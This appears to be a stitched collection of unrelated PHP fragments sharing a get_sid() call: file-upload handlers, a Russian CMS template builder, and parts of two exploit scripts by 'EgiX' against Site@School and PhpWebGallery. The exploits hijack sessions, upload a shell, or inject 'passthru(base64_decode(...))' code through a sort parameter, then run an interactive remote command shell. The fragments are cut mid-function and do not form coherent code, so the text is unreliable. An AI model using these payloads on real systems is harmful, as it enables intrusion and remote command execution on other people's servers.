/** 上传限制 */
protected function _upload()
{
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
if (!empty($_FILES)) {
import("@.ORG.Util.UploadFile");
$upload = new UploadFile();
$upload->subFolder = strtolower(MODULE_NAME);
$upload->savePath = get_save_path();
$upload->saveRule = "uniqid";
$upload->autoSub = true;
$upload->subType = "date";
/** @var allowExts上传格式设置 */
$allowExts_arr = array('jpg', 'jpeg', 'png');
$upload->allowExts = array_filter($allowExts_arr, 'upload_filter');
if (!$upload->upload()) {
$data['error'] = 1;
$data['message'] = $upload->getErrorMsg();
$data['status'] = 0;
exit(json_encode($data));
//exit($upload -> getErrorMsg());
} else {
//取得成功上传的文件信息
$upload_list = $upload->getUploadFileInfo();
$sid = get_sid();
$file_info = $upload_list[0];
// var_dump($file_info);
$model = M("File");
$model->create($upload_list[0]);
$model->create_time = time();
$model->user_id = get_user_id();
$model->sid = $sid;
$model->module = MODULE_NAME;
$file_id = $model->add();
$file_info['sid'] = $sid;
$file_info['error'] = 0;
$file_info['url'] = __ROOT__ . "/" . $file_info['savepath'] . $file_info['savename'];
$file_info['status'] = 1;
//header("Content-Type:text/html; charset=utf-8");
exit(json_encode($file_info));
//$this->ajaxReturn(json_encode($file_info),'上传成功',1,$file_info['url']);
//$this->success ('上传成功!');
}
}
}
private function _receive_file($str, &$model)
{
if (!empty($str)) {
$ar = array_filter(explode(",", $str));
foreach ($ar as $key => $value) {
$ar2 = explode("_", $value);
$cid = $ar2[0];
if (true) {
//if(strlen($cid)>10){
$inline = $ar2[1];
$file_name = $ar2[2];
$File = M("File");
$File->name = $file_name;
$File->user_id = $model->user_id;
$File->size = filesize($this->tmpPath . urlencode($value));
$File->extension = getExt($value);
$File->create_time = time();
$sid = get_sid();
$File->sid = $sid;
$File->module = MODULE_NAME;
$dir = 'mail/' . get_emp_no() . "/" . date("Ym");
$File->savename = $dir . '/' . uniqid() . '.' . $File->extension;
$save_name = $File->savename;
if (!is_dir(get_save_path() . $dir)) {
mkdir(get_save_path() . $dir, 0777, true);
chmod(get_save_path() . $dir, 0777);
}
if (!is_dir($this->tmpPath . $dir)) {
mkdir($this->tmpPath . $dir, 0777, true);
chmod($this->tmpPath . $dir, 0777);
}
if (rename($this->tmpPath . urlencode($value), get_save_path() . $save_name)) {
$file_id = $File->add();
if ($inline == "INLINE") {
$model->content = str_replace("cid:" . $cid, "/" . get_save_path() . $save_name, $model->content);
} else {
$add_file = $add_file . $sid . ';';
}
}
}
}
return $add_file;
}
}
}
$prefix = $match[1];
}
print "\n+-----------------------------------------------------------------------+";
print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |";
print "\n+-----------------------------------------------------------------------+\n";
if ($argc < 3) {
print "\nUsage...: php {$argv['0']} host path \n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to sas directory\n";
die;
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = get_sid();
if (empty($sid)) {
die("\n[-] Session id not found! Try later...\n");
} else {
print "\n[-] Hijacking with sid {$sid}\n";
}
if (!($ext = upload())) {
die("\n[-] Exploit failed...\n");
} else {
print "\n[-] Shell uploaded...starting it!\n";
}
while (1) {
print "\nsas-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit") {
$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
$uns = my_lang('feedback_t3');
}
//Бот
} else {
$uns = '';
}
echo '<h2>Загрузка</h2><hr noshade size="1"><br/>';
// ответ
echo '<p><span class="mes">' . $uns . '</span></p>';
// форма
echo '
<form
method="post"
action="' . SITE_URL . '/window/upload"
enctype="multipart/form-data">
<input type="hidden" name="sid" value="' . get_sid() . '">
<input type="file" name="filename" size="10" />
<SELECT NAME="dir" class="unit_button">
<OPTION VALUE="">user';
if (!empty($cat)) {
foreach ($cat as $c) {
echo '<OPTION VALUE="' . $c . '"> /' . $c;
}
}
echo '</SELECT>
<input type="submit" name="doupload" value="загрузить" class="unit_button"/>
</form>';
}
}
}
}
print "\n+---------------------------------------------------------------------------+";
print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------------+\n";
if ($argc < 3) {
print "\nUsage...: php {$argv['0']} host path [sid]\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to PhpWebGallery directory";
print "\nsid.....: a valid admin session id\n";
die;
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = isset($argv[3]) ? $argv[3] : get_sid();
check_plugin();
$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
print "\nphpwebgallery-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit") {
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
} else {
break;
protected function _upload()
{
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
if (!empty($_FILES)) {
import("@.ORG.Util.UploadFile");
$upload = new UploadFile();
$upload->subFolder = strtolower(MODULE_NAME);
$upload->savePath = get_save_path();
$upload->saveRule = "uniqid";
$upload->autoSub = true;
$upload->subType = "date";
$upload->allowExts = array_filter(explode(",", get_system_config('UPLOAD_FILE_TYPE')), 'upload_filter');
if (!$upload->upload()) {
$data['error'] = 1;
$data['message'] = $upload->getErrorMsg();
$data['status'] = 0;
exit(json_encode($data));
//exit($upload -> getErrorMsg());
} else {
//取得成功上传的文件信息
$upload_list = $upload->getUploadFileInfo();
$sid = get_sid();
$file_info = $upload_list[0];
$model = M("File");
$model->create($upload_list[0]);
$model->create_time = time();
$model->user_id = get_user_id();
$model->sid = $sid;
$model->module = MODULE_NAME;
$file_id = $model->add();
$file_info['sid'] = $sid;
$file_info['error'] = 0;
$file_info['url'] = "/" . $file_info['savepath'] . $file_info['savename'];
$file_info['status'] = 1;
exit(json_encode($file_info));
}
}
}
case 3:
// Step 2 - get sheet name.
printSheet($sid, $dataSource_dir, $dataSource_dirPath);
break;
case 4:
break;
case 5:
// When submit btn in step4 is clicked, this is called.
add_normalizer($sid, $dataSource_dir, $dataSource_dirPath);
unsetFileResources($sid, $dataSource_dir, $dataSource_dirPath);
break;
case 6:
display_excel_table($sid, $dataSource_dir, $dataSource_dirPath);
break;
case 7:
get_sid();
break;
case 8:
getFileSources($sid, $dataSource_dir, $dataSource_dirPath);
break;
case 9:
$filenames = $_SESSION["ktrArguments_{$sid}"]["filenames"];
$totalSeconds = 0;
foreach ($filenames as $filename) {
$totalSeconds += estimateLoadingProgress($dataSource_dirPath . $filename);
}
echo $totalSeconds;
break;
case 10:
getExcelPreview($sid, $dataSource_dirPath);
break;
function sp_get_macros()
{
global $page, $mod_comments, $_CATEGORIES, $ver, $categories, $my_lang_profile, $ENGINE_URL, $SITE_URL;
$tmpl_list = array();
// staff
$tmpl_list['index']['site_name'] = SITE_NAME;
$tmpl_list['index']['main'] = my_lang('main');
$tmpl_list['index']['url'] = SITE_URL;
$tmpl_list['index']['crumbs'] = get_crumbs();
$tmpl_list['index']['header'] = get_head();
//Заголовки [модуль headers]
$tmpl_list['index']['path'] = ENGINE_URL . '/themes/' . THEME;
$tmpl_list['index']['site_description'] = SITE_DESC;
//подзаголовок
$tmpl_list['index']['Y'] = date("Y");
$tmpl_list['index']['te_version'] = $ver;
$tmpl_list['index']['rss'] = SITE_RSS;
$tmpl_list['index']['auth_menu'] = bc_auth_menu();
//<li> меню авторизации
if (isset($_SESSION['name'])) {
$tmpl_list['index']['user'] = $_SESSION['name'];
/* $tmpl_list['index']['profile_link'] = <<<_MPF
<a href="$SITE_URL/lib/window/profile.php" onclick="window.open(this.href, '', 'resizable=yes,status=no,location=no,toolbar=no,menubar=no,fullscreen=no,scrollbars=no,dependent=no,width=500,left=150,height=500,top=10'); return false;">$my_lang_profile</a>
_MPF; */
}
//рубрики <li>
foreach ($categories as $cat) {
if ($cat['cat_count'] !== "0") {
$tmpl_list['index']['cat_list'] .= '
<li><a href="' . get_link('category', $cat['category_id']) . '">' . $cat['name'] . '
<small>(' . $cat['cat_count'] . ')</small></a></li>
';
}
}
//список страниц <li>
$menu = get_static_list_rank();
foreach ($menu as $link) {
$tmpl_list['index']['menu'] .= '<li><a href="' . SITE_URL . '/' . $link['sef'] . '">' . $link['title'] . '</a></li>';
}
## Cтраница
if ($page == 'static' || isset($_REQUEST['s'])) {
$tmpl_list['static']['title'] = print_static("title");
$tmpl_list['static']['static'] = print_static("content");
$f = TE_DIR . '/themes/' . THEME . '/static.html';
if (is_file($f)) {
$tmpl_list['index']['content'] .= sp_get_skin($f, $tmpl_list['static']);
}
} elseif (($page == 'article' || $page == 'main') && !isset($_REQUEST['id'])) {
//список записей
$DB = get_article_list();
if (!empty($DB)) {
if (isset($_REQUEST['category_id'])) {
$tmpl_list['index']['title'] = $_CATEGORIES[$_REQUEST['category_id']]['name'];
}
foreach ($DB as $p) {
if ($p['approve'] == 1) {
//формируем ссылку
if (!USE_SEF) {
$link = SITE_URL . '/?id=' . $p['id'];
} elseif (SEF_TYPE == 1) {
$link = SITE_URL . '/article/' . $_CATEGORIES[$p['category_id']]['sef'] . '/' . $p['sef'];
} elseif (SEF_TYPE == 2) {
$link = SITE_URL . '/' . $_CATEGORIES[$p['category_id']]['sef'] . '/' . $p['sef'];
}
}
if (@$_SESSION['status'] == 'admin') {
$tmpl_list['post_list']['post_edit_link'] = <<<_le
<a href="{$SITE_URL}/window/ca/?id={$p['id']}&action=edit" onclick="window.open(this.href, '', 'resizable=yes,status=no,location=no,toolbar=no,menubar=no,fullscreen=no,scrollbars=no,dependent=no,width=850,left=150,height=640,top=10'); return false;">Редактор</a>
_le;
$tmpl_list['post_list']['post_edit_url'] = "{$SITE_URL}/window/ca/?id={$p['id']}&action=edit";
}
$tmpl_list['post_list']['title'] = $p['title'];
if ($p['description'] !== '') {
$tmpl_list['post_list']['post'] = $p['description'] . ' <a href="' . $link . '">' . my_lang("article_more") . '</a>';
} else {
$tmpl_list['post_list']['post'] = $p['content'];
}
$tmpl_list['post_list']['post_url'] = $link;
$tmpl_list['post_list']['post_date'] = date(DATE_FORMAT, gm2local($p['stamp'], TZ));
$tmpl_list['post_list']['post_category_url'] = get_link('category', $p['category_id']);
$tmpl_list['post_list']['post_category'] = $_CATEGORIES[$p['category_id']]['name'];
$tmpl_list['post_list']['post_author'] = $p['author'];
$f = TE_DIR . '/themes/' . THEME . '/post_list.html';
if (is_file($f)) {
$tmpl_list['index']['content'] .= sp_get_skin($f, $tmpl_list['post_list']);
}
}
$tmpl_list['index']['navi'] = get_navi(get_artcl_sum(), ARTCLS_PER_PAGE);
}
} elseif (isset($_REQUEST['id'])) {
//$tmpl_post = array_merge($tmpl_list, $tmpl_post);
$profile = get_profile(print_article('author_id'));
## тело записи
$tmpl_list['post']['title'] = print_article("title");
$tmpl_list['post']['post'] = print_article("content");
$tmpl_list['post']['post_category_url'] = get_link('category');
$tmpl_list['post']['post_author'] = $profile['name'];
$a_id = print_article("author_id");
$tmpl_list['post']['post_author_link'] = <<<_APF
<a href="{$SITE_URL}/window/profile/?author_id={$a_id}" onclick="window.open(this.href, '', 'resizable=yes,status=no,location=no,toolbar=no,menubar=no,fullscreen=no,scrollbars=no,dependent=no,width=500,left=150,height=250,top=10'); return false;">{$profile["name"]}</a>
_APF;
if (@$_SESSION['status'] == 'admin') {
$tmpl_list['post']['post_edit_link'] = <<<_APE
<a href="{$SITE_URL}/window/ca/?id={$_REQUEST['id']}&action=edit" onclick="window.open(this.href, '', 'resizable=yes,status=no,location=no,toolbar=no,menubar=no,fullscreen=no,scrollbars=no,dependent=no,width=850,left=150,height=640,top=10'); return false;">Редактор</a>
_APE;
$tmpl_list['post']['post_edit_url'] = "{$SITE_URL}/window/ca/?id={$_REQUEST['id']}&action=edit";
}
$tmpl_list['post']['post_date'] = date(DATE_FORMAT, gm2local(print_article('stamp'), TZ));
$tmpl_list['post']['post_category'] = $_CATEGORIES[$_REQUEST['category_id']]['name'];
$f = TE_DIR . '/themes/' . THEME . '/post.html';
$tmpl_list['index']['content'] .= sp_get_skin($f, $tmpl_list['post']);
## комментарии
if ($mod_comments) {
//если модуль "вкл"
function del_link($id)
{
if ($_SESSION['status'] == 'admin') {
return ' <a href="' . SITE_URL . '/?id=' . $_REQUEST['id'] . '&cid=' . $id . '&com_act=del">X</a>';
} else {
return '';
}
}
$comm_data = get_comments();
//получаем список комментов и начинаем обходить шаблон комментария
if (isset($comm_data[0])) {
foreach ($comm_data as $p) {
$profile = get_profile($p['author_id']);
//комментатор не зарег-н
if (empty($p['author_id'])) {
$tmpl_list['comment']['name'] = $p['author'];
//if (!empty($p['email'])) {
$gra = get_gravatar($p['email'], $size = 35);
//}
} else {
$gra = get_gravatar($profile['email'], $size = 35);
$tmpl_list['comment']['name'] = <<<_PF
<a href="{$SITE_URL}/window/profile?author_id={$p["author_id"]}" onclick="window.open(this.href, '', 'resizable=yes,status=no,location=no,toolbar=no,menubar=no,fullscreen=no,scrollbars=no,dependent=no,width=500,left=150,height=250,top=10'); return false;">{$profile['name']}</a>
_PF;
}
$tmpl_list['comment']['name'] .= del_link($p['id']);
$tmpl_list['comment']['gravatar'] = $gra['img'];
$tmpl_list['comment']['gravatar_url'] = $gra['url'];
$tmpl_list['comment']['date'] = date(DATE_FORMAT, gm2local($p['date'], TZ));
//[lib.php, date = stamp]
$tmpl_list['comment']['comment'] = $p['content'];
$f = TE_DIR . '/themes/' . THEME . '/comment.html';
$tmpl_list['comment_list']['comments'] .= sp_get_skin($f, $tmpl_list['comment']);
}
}
$tmpl_list['comment_list']['comments_form'] = print_comments_form();
//и вставляем полученный список комментариев в шаблон списка комментариев (вот неожиданность:)
if (is_file(TE_DIR . '/themes/' . THEME . '/comment_list.html')) {
$tmpl_list['index']['content'] .= sp_get_skin(TE_DIR . '/themes/' . THEME . '/comment_list.html', $tmpl_list['comment_list']);
}
}
} elseif ($page == "album") {
if (is_file(TE_DIR . '/themes/' . THEME . '/album.html')) {
$album = get_album();
if (!empty($album)) {
foreach ($album as $img) {
$tmpl_list['album']['album'] .= '<a target="_blank" href="' . $img['url'] . '">
<img src="' . $img['url'] . '" HSPACE="0" VSPACE="0" border="0"
title="Добавлена ' . date("d.m.Y H:i:s", $img['time']) . '" style="max-height: 70px;">
</a>';
}
} else {
$tmpl_list['album']['album'] .= my_lang('album_empty');
}
$tmpl_list['index']['content'] .= sp_get_skin(TE_DIR . '/themes/' . THEME . '/album.html', $tmpl_list['album']);
} else {
$tmpl_list['index']['content'] .= 'Не обнаружено файла-шаблона для альбома(';
}
} elseif ($page == "feedback") {
if (is_file(TE_DIR . '/themes/' . THEME . '/feedback.html')) {
$tmpl_list['feedback']['sid'] = get_sid();
$reg = Registry::instance();
$tmpl_list['feedback']['feedback_msg'] = $reg->get('feedback_msg');
$tmpl_list['index']['content'] .= sp_get_skin(TE_DIR . '/themes/' . THEME . '/feedback.html', $tmpl_list['feedback']);
}
}
//список последних записей <li><a>link</a></li>
$tmpl_list['index']['post_list'] = bc_postlist(7);
$tmpl_list['index']['theme_list'] = bc_theme_list();
$tmpl_list['index']['time'] = microtime(true) - ST;
return $tmpl_list;
}
